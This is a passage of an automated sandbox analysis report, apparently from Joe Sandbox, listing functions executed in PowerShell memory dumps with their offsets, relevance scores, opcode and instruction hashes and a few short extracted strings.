                                                        • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                        • Instruction ID: 62085d2c31476900ff85a65f94f7eb43c3272102ba613799eb3dd48313e2814d
                                                        • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                        • Instruction Fuzzy Hash: 12F0C232604418FFC7129FA5DC0099EBBA8EF46360B2140A9E800F7210D674EF019BA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Function 0718BB08 Relevance: 1.7, Instructions: 1706COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fa9d975816f56a0a4e58107670d1976fd1390c7588f9a931972a4ac93b9d7f0
                                                        • Instruction ID: 6da3aa1aaab1b862b498d57fcc086f689aaa3cdbec458f09db5bb882a361096d
                                                        • Opcode Fuzzy Hash: 7fa9d975816f56a0a4e58107670d1976fd1390c7588f9a931972a4ac93b9d7f0
                                                        • Instruction Fuzzy Hash: 51F25E74A00314CFDB64EF24C951BAAB7B2BF89304F1084A9D55AAB781DB31ED91CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465F000 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V\k
                                                        • API String ID: 0-79730572
                                                        • Opcode ID: f47b8eaa4e06c040a592221214874fc641323576538d72a90a5e784e1ab3f938
                                                        • Instruction ID: ce89eb651a0d5631ba45a5003abfbc7a530f29422015ddb9bc1008b9a4605e06
                                                        • Opcode Fuzzy Hash: f47b8eaa4e06c040a592221214874fc641323576538d72a90a5e784e1ab3f938
                                                        • Instruction Fuzzy Hash: 2CB14C71E00209CFEB18DFA9D88579EBBF2BF88704F148529D815A7364FB74A845CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465F8D0 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df0bd34c4cb4f3753da23e67ef9af4d53e9a979396eff0b3d494bf3018dcf3bd
                                                        • Instruction ID: 3df6721995a4c1d32ca8d0fe9973aa56907345428d76663403c1cd9e3d4f178f
                                                        • Opcode Fuzzy Hash: df0bd34c4cb4f3753da23e67ef9af4d53e9a979396eff0b3d494bf3018dcf3bd
                                                        • Instruction Fuzzy Hash: C8B15C70E00609DFDF14CFA9D88579EBBF2AF88714F148529D815EB3A4EB74A841CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465B910 Relevance: 6.7, Strings: 5, Instructions: 478COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8N\k$h]\k$h]\k$h]\k$I\k
                                                        • API String ID: 0-3534282386
                                                        • Opcode ID: f656448196de2b9f731ff502d4d25b7a5d0571e9777da2fd08965d49b17ca404
                                                        • Instruction ID: e0dbb58400060f48a936992316a35392c1aa63f801294e60c97f326b5b398e6c
                                                        • Opcode Fuzzy Hash: f656448196de2b9f731ff502d4d25b7a5d0571e9777da2fd08965d49b17ca404
                                                        • Instruction Fuzzy Hash: 60125230B002188FDB25DB74C8556ADB7B2BF89341F1480A9D90AAB361DF35EE95CF85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465EFF4 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V\k
                                                        • API String ID: 0-79730572
                                                        • Opcode ID: 0adb888500bec79e98d8c520ad2f02ecdfea119f92d05114dd632f1db7a9eff7
                                                        • Instruction ID: 1e66b850f611b1aa8642c026c93529f2920643cec384d32243b70beb11741d14
                                                        • Opcode Fuzzy Hash: 0adb888500bec79e98d8c520ad2f02ecdfea119f92d05114dd632f1db7a9eff7
                                                        • Instruction Fuzzy Hash: 31B15B70E00209CFEB14DFA9D88579EBBF2BF88714F148529D815A7364EB74A845CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0718C759 Relevance: 1.1, Instructions: 1096COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6718760ef8805f10225f0180971e22da6d24da552732149b410b12ddbf0be4ec
                                                        • Instruction ID: 4d82fb56985ef4d410ceb2d14dd42d9824f1bdd579c754fd205998170054bde3
                                                        • Opcode Fuzzy Hash: 6718760ef8805f10225f0180971e22da6d24da552732149b410b12ddbf0be4ec
                                                        • Instruction Fuzzy Hash: 79B2A074A00314CFDB64DF24C951BAAB7B2BF89304F5084A9D45A6B381DB35ED92CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07183130 Relevance: 1.1, Instructions: 1087COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75df4331effc93f2842e157a85b682a7e1e068844721dc53cae4b25674de02c2
                                                        • Instruction ID: 7cf8dd0510367a4e6776162321fccca783f5f79d2bb18d93cb2f2bb059222c0a
                                                        • Opcode Fuzzy Hash: 75df4331effc93f2842e157a85b682a7e1e068844721dc53cae4b25674de02c2
                                                        • Instruction Fuzzy Hash: 2792F470A00315DFDB64EF68C851BAEB7B2AF85700F5484AAD91AAB380DB31ED51CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07184148 Relevance: .8, Instructions: 804COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67fae0f014a8f236328d8243300e8b3245d23dff85ca70e644b323b126590858
                                                        • Instruction ID: 58ea60626d8ace449ef98a7795cc2fde787940cf43da784a960580c9d4c0f8b2
                                                        • Opcode Fuzzy Hash: 67fae0f014a8f236328d8243300e8b3245d23dff85ca70e644b323b126590858
                                                        • Instruction Fuzzy Hash: 2872CF70A00355CFEB64EF64C850BAAB7B2AF85300F4085ADD91AAB780DB35ED91CF55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07187E18 Relevance: .6, Instructions: 593COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5be095bb5399f4820c9849771cc2828f94d66c300a36a61a404f258ea4ba0fe7
                                                        • Instruction ID: fdf636b223dc0aa0ec9a01b22300c6d1d6bb8d115e0e4e22fbbdae5dd68fb2b1
                                                        • Opcode Fuzzy Hash: 5be095bb5399f4820c9849771cc2828f94d66c300a36a61a404f258ea4ba0fe7
                                                        • Instruction Fuzzy Hash: DA124BB1B143458FD756AB78881176BBBA2AFC2210F64C0BAD515CF2D5EB32CC51CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07180778 Relevance: .6, Instructions: 592COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2b5269a28e4b5b3a6c8b8dae980d5272fd11843ef58d5702ab4a01abae874a6
                                                        • Instruction ID: 61bb4cf979fdd4d8591c447e0cec6aac2498e94a6955ab244aad0e0cc76dd7af
                                                        • Opcode Fuzzy Hash: f2b5269a28e4b5b3a6c8b8dae980d5272fd11843ef58d5702ab4a01abae874a6
                                                        • Instruction Fuzzy Hash: 1F126B7170430A8FD766AF69C45076ABBE2AFCA210F1580ABD549CF391DB31CD49CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0718C924 Relevance: .5, Instructions: 538COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 189aad47a8c390f7e85b5784ecf0b5ed4821ee70122512ae5cf98899db64096e
                                                        • Instruction ID: 310c1b0a94c949a17034cb2ec2a0c1d4ffe67cd8ecdbadc8fb58e90b9abe5778
                                                        • Opcode Fuzzy Hash: 189aad47a8c390f7e85b5784ecf0b5ed4821ee70122512ae5cf98899db64096e
                                                        • Instruction Fuzzy Hash: 3F32B274A00314CFDB64DF64C850BAAB7B2BF89300F5084A9D95A5B381DB35ED92CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07181640 Relevance: .5, Instructions: 481COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 715e6b4205a258dc78f4094a9471954631aeaf184280423b2271f8b50365179b
                                                        • Instruction ID: 7e29685212a9e119161f265ee13d526f8f865dd8ef8c1671cd51b5f1e685887c
                                                        • Opcode Fuzzy Hash: 715e6b4205a258dc78f4094a9471954631aeaf184280423b2271f8b50365179b
                                                        • Instruction Fuzzy Hash: 1D12DEB1B002099FD754DB98C451AAABBF2AF8A314F14C06DE9059F385DB72EC42CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07184CEC Relevance: .5, Instructions: 465COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfbb9c4f8630a7b7f7128e48cbaa7c5c71cdd293528a8b7a3df78f0722d74295
                                                        • Instruction ID: aae1ceae16e4db781a440232120f3d2cc520e170d7d9673431b4683f675ca904
                                                        • Opcode Fuzzy Hash: cfbb9c4f8630a7b7f7128e48cbaa7c5c71cdd293528a8b7a3df78f0722d74295
                                                        • Instruction Fuzzy Hash: C7125AB4A00242DFDB54DF88C541E6ABBB2AF85314F15C1A9ED159B392CB72ED42CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0718CBB8 Relevance: .4, Instructions: 435COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53b9ec2e80665ed87668b061e2a40e3767246b6e801539cdc296265b2130f884
                                                        • Instruction ID: 843f373434604aa3f5c613ba2a46506817e98e2fdb748c1f90b21750183cf0b5
                                                        • Opcode Fuzzy Hash: 53b9ec2e80665ed87668b061e2a40e3767246b6e801539cdc296265b2130f884
                                                        • Instruction Fuzzy Hash: B2124EB0A00315CFEBA5EF24C951BA9B7B2BB45304F0184D9E55AAB381DB31ED91CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0718C9AD Relevance: .4, Instructions: 431COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 36672423db0f79d59c878b7dd531640152b91b5ddfb85d91db7cb0d00cb64239
                                                        • Instruction ID: b49fa97ff237f07ca9411433e2d2b611eef5924ee7a67b1a1b79c5407aec9f77
                                                        • Opcode Fuzzy Hash: 36672423db0f79d59c878b7dd531640152b91b5ddfb85d91db7cb0d00cb64239
                                                        • Instruction Fuzzy Hash: C9124EB0A00315CFDBA5EF24C951BA9B7B2BB45304F0184D9E55AAB381DB71ED81CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07181B0E Relevance: .4, Instructions: 422COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac2be0d40b6793312447f7c7d176f29285ab9e45bdbebaeb79802eba9dcbcfb1
                                                        • Instruction ID: 626d66507d8b1f87d8c1eb71b228b910514763ff8fcaf13e964b555e01ae44f2
                                                        • Opcode Fuzzy Hash: ac2be0d40b6793312447f7c7d176f29285ab9e45bdbebaeb79802eba9dcbcfb1
                                                        • Instruction Fuzzy Hash: E302AAB6A00209AFDB54DF58C541BAABBB2EF85318F14C06DE9059B391CB72ED42DF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07181625 Relevance: .4, Instructions: 399COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8f914b9fa79b8e8a71d53ad75fb5cde3809d807851e3c16feeb1bd5a13e947d
                                                        • Instruction ID: 1c93053d151d3018d9da5b2ce286657a25f9221536b78dcf61c407084628c0ca
                                                        • Opcode Fuzzy Hash: b8f914b9fa79b8e8a71d53ad75fb5cde3809d807851e3c16feeb1bd5a13e947d
                                                        • Instruction Fuzzy Hash: 50F19AB2A00209AFDB54DF58C441EA9BBF2AF89314F15C1ADE905AB391C772EC42DF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465ADE0 Relevance: .4, Instructions: 381COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f04ff021f2dd40d5c336d6f63ca77e8efb2a481a6e0e3a6d1a0fa3689954dfd5
                                                        • Instruction ID: cded4dcbf45e006a1100f25d413590cd4d6fe87aa3fbb2888a7845f048f821d7
                                                        • Opcode Fuzzy Hash: f04ff021f2dd40d5c336d6f63ca77e8efb2a481a6e0e3a6d1a0fa3689954dfd5
                                                        • Instruction Fuzzy Hash: 82F11874A00209DFDB15CFA8D494AADFBB2FF88310F248559E915AB365D731ED82CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07185088 Relevance: .4, Instructions: 373COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2df9ddca1adea7ef188f0413824de8bf401710218d17ec9c8a1329837f65bddd
                                                        • Instruction ID: d3e24ddc6b9656e798b048f33ce2eac8285618f89aff87e9a5d3497097b10c72
                                                        • Opcode Fuzzy Hash: 2df9ddca1adea7ef188f0413824de8bf401710218d17ec9c8a1329837f65bddd
                                                        • Instruction Fuzzy Hash: FAE17CB1A00205CFDB54EB68C451BAEBBB3EB85304F24C069E9056F395DB71ED628F91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 046572A0 Relevance: .3, Instructions: 316COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1390d3c98572d1c40d0742dbeb1f14d855a24fa68e8a65f277ed782c4b73a8a5
                                                        • Instruction ID: eaa997989b85e3e6ca50cd857a1a8a608e0d697f3f68b22be362cd01cc35d9d5
                                                        • Opcode Fuzzy Hash: 1390d3c98572d1c40d0742dbeb1f14d855a24fa68e8a65f277ed782c4b73a8a5
                                                        • Instruction Fuzzy Hash: 9CC17E35A00208DFCB14DFA4D944AADBBB2FF85311F158559E806AB365EB35ED49CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465F8C5 Relevance: .3, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 509a5b3a32982444e1712b2b56df6de89dbc4b81a75a5790ea38586973b5a48a
                                                        • Instruction ID: 18b0e0273ec3a94f9c6bd55ef40c353173dbe8ae395019e5010bcb78f49bde42
                                                        • Opcode Fuzzy Hash: 509a5b3a32982444e1712b2b56df6de89dbc4b81a75a5790ea38586973b5a48a
                                                        • Instruction Fuzzy Hash: 68B16D70E0060ADFDF14CFA9D88579EBBF2AF48714F148529D815EB3A4EB74A841CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 071859A0 Relevance: .2, Instructions: 243COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ae4d284559bac221b6c7d79094d439412fb248e512b99923d413e5181a7f232
                                                        • Instruction ID: 55664bb1fd6ca9ab0d99aecdeeea77a9cf1cb25099e14890763f14648251d7e8
                                                        • Opcode Fuzzy Hash: 3ae4d284559bac221b6c7d79094d439412fb248e512b99923d413e5181a7f232
                                                        • Instruction Fuzzy Hash: 3B716DB27103058FCB65AB79884136ABBE7EF86651F14807AD845CB3C1EB31D961CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07185DA8 Relevance: .2, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea2ab97d92bdeafac4bc467fe2afd4a830250eb8ad6a3694a9b83b327219a490
                                                        • Instruction ID: 64103b892b9f62df0fa1291968874f1e8e5fcfb5299ae23428d87e5cc9a623d4
                                                        • Opcode Fuzzy Hash: ea2ab97d92bdeafac4bc467fe2afd4a830250eb8ad6a3694a9b83b327219a490
                                                        • Instruction Fuzzy Hash: 08919BB0A00205DFDB54EF58C845AAAB7F3EF89310F148069E906AB391DB72DC61CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04652AA0 Relevance: .2, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1553d4b3794508f5f91707c381a094b2e4f8fc6940b725e701450d9bc77dacbb
                                                        • Instruction ID: 166d903605746fb3e2aa432b1db96dfc5042387c0a0c4854d2b1685b6251a6c1
                                                        • Opcode Fuzzy Hash: 1553d4b3794508f5f91707c381a094b2e4f8fc6940b725e701450d9bc77dacbb
                                                        • Instruction Fuzzy Hash: 2A917A74A00205CFCB15CF58C4A4AAABBB1FF88310F25869AD955AB3A5D735FC51CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07185D8D Relevance: .2, Instructions: 221COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c42aeffc3bb97a7b48aa8b82d5fe826ceda0fdff741a91bd1ac5df40f196e31
                                                        • Instruction ID: fe9fb5c696e8ea1f2f7f9662df68431438b977c6dc803ff24e46cb23a4aae53a
                                                        • Opcode Fuzzy Hash: 1c42aeffc3bb97a7b48aa8b82d5fe826ceda0fdff741a91bd1ac5df40f196e31
                                                        • Instruction Fuzzy Hash: C591ADB1A002019FDB55DF54C445BAABBF3EF89310F158069E8156B392CB72EDA1CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04657A68 Relevance: .2, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59d7a47f1eb1860eb7ca6c9652ceca843370c81e94b64b2260f04618d1e034c4
                                                        • Instruction ID: 536bf913e09f5413c402b84e9bc8a5fc952d6e89b72edd5e4934c26b57accfcf
                                                        • Opcode Fuzzy Hash: 59d7a47f1eb1860eb7ca6c9652ceca843370c81e94b64b2260f04618d1e034c4
                                                        • Instruction Fuzzy Hash: 33717A31A00209CFDB14DF68C890A9EBBF2FF89315F14856AD855DB761EB71AC46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04657BD6 Relevance: .2, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7bae3bdf176f636e7ab5ee14c34c55710f7206ca87257b8c80475d17a9af1dbf
                                                        • Instruction ID: 111236ab6d18641cb583e7545c9190b1506ab0ddc7b4f7310e702e3aea444c43
                                                        • Opcode Fuzzy Hash: 7bae3bdf176f636e7ab5ee14c34c55710f7206ca87257b8c80475d17a9af1dbf
                                                        • Instruction Fuzzy Hash: DF715070A00208DFDB14DFB5D894BADBBF2BF88345F14852AD811AB7A1DB35AD45CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07187DFD Relevance: .1, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2924612494.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7180000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be07fa85aa331d8c322ae1cf9b89885449d59f4be03eb23fcbaf17704f89f85f
                                                        • Instruction ID: 224be9834e6491043cd8ef07906a7038c0c18aa9a4d3527c714c96f19c2eae88
                                                        • Opcode Fuzzy Hash: be07fa85aa331d8c322ae1cf9b89885449d59f4be03eb23fcbaf17704f89f85f
                                                        • Instruction Fuzzy Hash: 0B413DB16043028FCB66EFA58401BBB7BA29F81290B34409AE4109F2D5E732DD51CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 046577F9 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c8ab56b1c845f163e28e7ef606fb204e3e86f5ea7f409555d153ca62272ea35
                                                        • Instruction ID: a6d497c7bac0207d91899b6e05a21f98266d4ac59aa12f598e175b2aa6116213
                                                        • Opcode Fuzzy Hash: 5c8ab56b1c845f163e28e7ef606fb204e3e86f5ea7f409555d153ca62272ea35
                                                        • Instruction Fuzzy Hash: 7A419F35B042148FDB15DB74C858AAE7BF2EF89351F084469E806EB7B0DB35AD45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0465B0E7 Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2906009831.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4650000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 003572f189496e90696b325e43fa8f4dff80b218b64da00c4575753adc8dcde9
